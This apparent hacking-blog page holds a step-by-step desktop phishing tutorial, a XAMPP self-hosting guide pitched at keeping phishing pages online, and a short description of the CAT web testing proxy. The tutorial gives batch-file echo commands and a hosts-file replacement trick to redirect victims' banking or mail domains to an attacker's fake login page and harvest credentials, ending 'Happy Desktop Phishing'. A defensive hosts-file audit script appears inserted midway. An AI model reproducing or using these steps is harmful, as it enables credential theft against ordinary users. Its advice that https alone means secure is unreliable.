Desktop Phishing Tutorial - Step By Step Explained

Desktop phishing is an advanced form of phishing. If you want to read the basics of normal phishing, you can read my previous article on phishing from HERE.
The differences between phishing and desktop phishing are as follows:






In PHISHING :-

1. Attacker convinces the victim to click on the link of a fake login page which resembles a genuine login page.
2. Victim enters his credentials in the fake login page, and they go to the attacker.
3. Victim is then redirected to an error page or the genuine website, depending on the attacker.

But the main drawback of phishing is that the victim can easily differentiate between the fake and the real login page by looking at the domain name. We can overcome this in desktop phishing by spoofing the domain name.

In DESKTOP PHISHING :-


1. Attacker sends an executable/batch file to the victim, and the victim is supposed to double-click on it. Attacker's job is done.
2. Victim types the domain name of the original/genuine website and is taken to our fake login page. But the domain name remains the same as typed by the victim, and the victim doesn't come to know.
3. The rest is the same as in normal phishing.



 
What is the Hosts File?


The hosts file is a text file containing domain names and the IP addresses associated with them.

Location of hosts file in windows: C:\Windows\System32\drivers\etc\

Whenever we visit any website, say www.anything.com, a query is sent to the Domain Name Server (DNS) to look up the IP address associated with that website/domain. But before doing this, the hosts file on our local computer is checked for the IP address associated with the domain name.



Suppose we make an entry in the hosts file as shown. When we visit www.anywebsite.com, we would be taken to 115.125.124.50. No query for resolving the IP address associated with www.anywebsite.com would be sent to DNS.



What is the attack?
I hope you have got an idea of how modification of this hosts file on the victim's computer can be misused. We need to modify the victim's hosts file by adding the genuine domain name and the IP address of our fake website/phishing page. Whenever the victim visits the genuine website, he would be directed to our fake login page, and the domain name in the URL box would remain genuine as typed by the victim. Hence the domain name is spoofed.

Two Steps to perform attack :-
1. Create and host phishing page on your computer.
2. Modify victim's hosts file.


Step 1 :-

Web hosting sites like 110mb.com, ripway.com etc., where we usually upload our phishing page, do not provide an IP that points to your website like www.anything.110mb.com. An IP address points to a web server and not a website. So we need to host the phishing page on our computer using web server software like WAMP or XAMPP.
Kindly read my simple tutorial on setting up an XAMPP web server HERE and this step would be clear to you.

Step 2 :-

This step can be performed in two different ways.

Method 1 :- Send the victim a zip file containing a modified hosts file. When the zip file is clicked, it automatically replaces the victim's original hosts file with the modified hosts file.

Copy your hosts file and paste it anywhere. Edit it with any text editor and associate your public IP address with the domain you wish, as shown.

Like in this case, when the victim visits gmail.com, he would be taken to the website hosted on IP 'xxx.xxx.xxx.xxx'. Replace it with your public IP. Compress the hosts file such that when the victim opens it, it automatically gets copied to the default location C:\Windows\system32\drivers\etc and the victim's hosts file gets replaced by our modified hosts file.










Then you can bind this file with any exe (using a binder) or directly give it to the victim. He is supposed to click it and you are done.

Method 2 :- Create a batch file which would modify the hosts file as per your need.

Open your notepad and type the following text

echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts
echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts 
Obviously, replace it with your own IP and website.

 



Save the file as 'all files' instead of txt files and name it anything.bat. The extension must be .bat.
When the victim runs this file, a new entry will be made in the hosts file.

You can test both of the above methods by modifying your own hosts file.

Limitations of attack :-

1. Our public IP address is most probably dynamic, so it changes every time we disconnect and connect. To overcome this we need to purchase a static IP from our ISP.
2. The browser may warn the victim that the Digital Certificate of the website is not genuine.

Countermeasures:-

Never just blindly enter your credentials in a login page, even if you yourself have typed the domain name in the web browser. Check whether the protocol is "http" or "https". https is secure.
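
A defender-side check for the hosts-file tampering described in this tutorial, added here as an example (not code from the original post): it parses a hosts file and reports any watched login domain pinned to a non-loopback address. The watchlist, the sample file contents and the function names are assumptions made for illustration.

```python
import ipaddress
import sys

# Constructed sample hosts file (203.0.113.0/24 is a documentation range).
SAMPLE_HOSTS = """\
# sample hosts file
127.0.0.1       localhost
::1             localhost
0.0.0.0         ads.example.net      # local ad block
203.0.113.50    www.gmail.com gmail.com
203.0.113.50    WWW.Example-Bank.test.   # trailing comment, mixed case
not-an-ip       broken.example
"""

# Assumed watchlist: domains users log in to; adjust per environment.
WATCHLIST = {"gmail.com", "example-bank.test"}

def parse_hosts(text):
    """Yield (line_no, ip, hostnames) for each well-formed hosts entry."""
    for line_no, raw in enumerate(text.splitlines(), 1):
        fields = raw.split("#", 1)[0].split()   # drop comments, split on whitespace
        if len(fields) < 2:
            continue
        try:
            ip = ipaddress.ip_address(fields[0])
        except ValueError:
            continue                             # first field is not an IP address
        yield line_no, ip, [h.lower().rstrip(".") for h in fields[1:]]

def audit_hosts(text, watchlist=WATCHLIST):
    """Return (line_no, ip, hostname) for watched names pinned to a remote IP."""
    findings = []
    for line_no, ip, names in parse_hosts(text):
        if ip.is_loopback or ip.is_unspecified:
            continue                             # localhost / sinkhole entries
        for name in names:
            if any(name == d or name.endswith("." + d) for d in watchlist):
                findings.append((line_no, str(ip), name))
    return findings

if __name__ == "__main__":
    # Pass the real file, e.g. C:\Windows\System32\drivers\etc\hosts, as argv[1].
    if len(sys.argv) > 1:
        with open(sys.argv[1], encoding="utf-8-sig", errors="replace") as fh:
            text = fh.read()
    else:
        text = SAMPLE_HOSTS
    for line_no, ip, name in audit_hosts(text):
        print(f"line {line_no}: {name} is pinned to {ip}, bypassing DNS")
```

Any finding means the name resolves from the local file instead of DNS, so the entry should be traced back to whatever process or archive wrote it.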

Happy Desktop Phishing @@@@@@



Setting Webserver- Host Webpages On Your Own Computer

Have you ever wondered how to set up a website without signing up at any web hosting site? Learning web site designing and want to keep testing how your web pages look? Free web hosting sites removing your phishing pages?

The solution to such things is in this post. Basically, we are going to turn our PC into a server.

What is a server?

A server is, we can say, any computer that is serving something. A web server serves web pages; an FTP server serves files. Any computer can be turned into a server by simply installing server software.



In this post, I am using XAMPP.
By installing this, the contents of a particular directory of our computer would be accessible all over the internet. This means one could access those contents from any part of the world through our public IP address.

You can place your web pages or whatever you wish in that directory.
Download XAMPP from HERE.
This package consists of Apache HTTP server (A), MySQL database (M), PHP (P) and Perl (P); the X represents cross-platform.

After downloading it, simply install it.




At the last stage of installation you will get this. Press 1 to start the XAMPP control panel.

The control panel would look like this.

Click Start to start the Apache server. Now let's check whether it's working.
Open your web browser and visit your local machine address, that is 127.0.0.1 or localhost. You should get the XAMPP page as shown.

Now check whether it is accessible on the internet. Type your public/external IP in your web browser and hit enter.
If you got a page as shown, follow these instructions:
 


1. Go to file httpd-xampp.conf
2. Remove "deny from all" and save the file.
3. Now restart the server and hopefully it would be all right now.

Now what?

There must be a directory 'htdocs' at location C:\xampp\. The contents of this particular directory will be available to everybody. Suppose you place a file anything.html in the 'htdocs' directory. It would be accessible at
1. http://localhost/anything.html or http://127.0.0.1/anything.html
(Obviously, the above two links are going to work on your own computer only.)
2. http://xxx.xxx.xxx.xxx/anything.html (where xxx.xxx.xxx.xxx is your IP address)
You can start/stop this service simply through the control panel.
That's all. You can also use FileZilla (FTP server software) and MySQL (database) as per your need.

Get a domain name?
Now you would want to get a domain name instead of using the public IP to check out your contents.
But how can we get a domain name when our IP is dynamic, and to which IP would the domain name point?
Don't worry, we have a solution.
1. Log on to www.no-ip.com and sign up for an account. Choose an available domain name.
2. Download their dynamic DNS update client and run it on your PC.

This client would automatically keep updating your dynamic IP address, and that is how the selected domain would always be pointing to your IP address.

Note: You might need to do port forwarding if you are behind a router. Kindly mention any queries regarding that in the comments.
EnJoy Friends @@@



CAT - Web Application Security Test & Assessment Tool

CAT is designed to facilitate manual web application penetration testing for more complex, demanding application testing tasks. It removes some of the more repetitive elements of the testing process, allowing the tester to focus on individual applications, thus enabling them to conduct a much more thorough test. Conceptually it is similar to other proxies available both commercially and open source, but CAT provides a richer feature set and greater performance, combined with a more intuitive user interface.
                                                                     

There are a number of differences between CAT and currently available web proxies. They include:
  • CAT uses Internet Explorer’s rendering engine for accurate HTML representation
  • It supports many different types of text conversions including: URL, Base64, Hex, Unicode, HTML/XML, SQL and JavaScript no quotes
  • It offers integrated SQL Injection and XSS Detection
  • Synchronized Proxies for Authentication and Authorisation checking
  • Faster performance due to HTTP connection caching
  • SSL Version and Cipher checker using OpenSSL
  • Greater flexibility for importing/exporting logs and saving projects
  • Tabbed Interface allows for multiple tools at once e.g. multiple repeaters & different logs
  • The ability to repeat and modify a sequence of requests (particularly useful in SSO testing)
  • It’s free!